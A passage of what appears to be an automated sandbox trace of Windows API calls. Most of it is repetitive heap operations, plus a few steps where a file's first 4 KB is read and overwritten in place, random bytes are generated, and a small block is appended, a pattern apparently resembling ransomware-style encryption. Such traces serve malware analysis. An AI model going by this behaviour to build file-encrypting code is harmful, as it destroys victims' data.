dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.182] GetProcessHeap () returned 0x4f10000 [0084.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.183] GetProcessHeap () returned 0x4f10000 [0084.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.184] GetProcessHeap () returned 0x4f10000 [0084.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.185] GetProcessHeap () returned 0x4f10000 [0084.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.185] GetProcessHeap () returned 0x4f10000 [0084.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.185] GetProcessHeap () returned 0x4f10000 [0084.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.185] GetProcessHeap () returned 0x4f10000 [0084.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.185] GetProcessHeap () returned 0x4f10000 [0084.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.185] GetProcessHeap () returned 0x4f10000 [0084.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.185] GetProcessHeap () returned 0x4f10000 [0084.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.185] GetProcessHeap () returned 0x4f10000 [0084.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.185] GetProcessHeap () returned 0x4f10000 [0084.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.185] GetProcessHeap () returned 0x4f10000 [0084.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.185] SetFilePointerEx (in: hFile=0x974, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.185] WriteFile (in: hFile=0x974, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0084.185] WriteFile (in: hFile=0x974, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0084.185] GetProcessHeap () returned 0x4f10000 [0084.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0084.186] GetProcessHeap () returned 0x4f10000 [0084.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.186] GetProcessHeap () returned 0x4f10000 [0084.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.186] CloseHandle (hObject=0x974) returned 1 [0084.187] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 126 [0084.187] SetFilePointerEx (in: hFile=0x978, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.187] ReadFile (in: hFile=0x978, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0084.187] SetFilePointerEx (in: hFile=0x978, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.188] GetProcessHeap () returned 0x4f10000 [0084.188] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.188] GetProcessHeap () returned 0x4f10000 [0084.188] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.188] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.188] GetProcessHeap () returned 0x4f10000 [0084.188] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0084.188] ReadFile (in: hFile=0x978, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.236] SetFilePointerEx (in: hFile=0x978, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.236] WriteFile (in: hFile=0x978, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.236] GetProcessHeap () returned 0x4f10000 [0084.236] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.236] GetProcessHeap () returned 0x4f10000 [0084.236] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.237] GetProcessHeap () returned 0x4f10000 [0084.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.238] GetProcessHeap () returned 0x4f10000 [0084.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.239] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.239] GetProcessHeap () returned 0x4f10000 [0084.240] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.240] GetProcessHeap () returned 0x4f10000 [0084.240] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.241] GetProcessHeap () returned 0x4f10000 [0084.241] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.241] GetProcessHeap () returned 0x4f10000 [0084.241] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.241] GetProcessHeap () returned 0x4f10000 [0084.241] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.241] GetProcessHeap () returned 0x4f10000 [0084.241] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.241] GetProcessHeap () returned 0x4f10000 [0084.241] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.241] SetFilePointerEx (in: hFile=0x978, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.241] WriteFile (in: hFile=0x978, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0084.241] WriteFile (in: hFile=0x978, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, 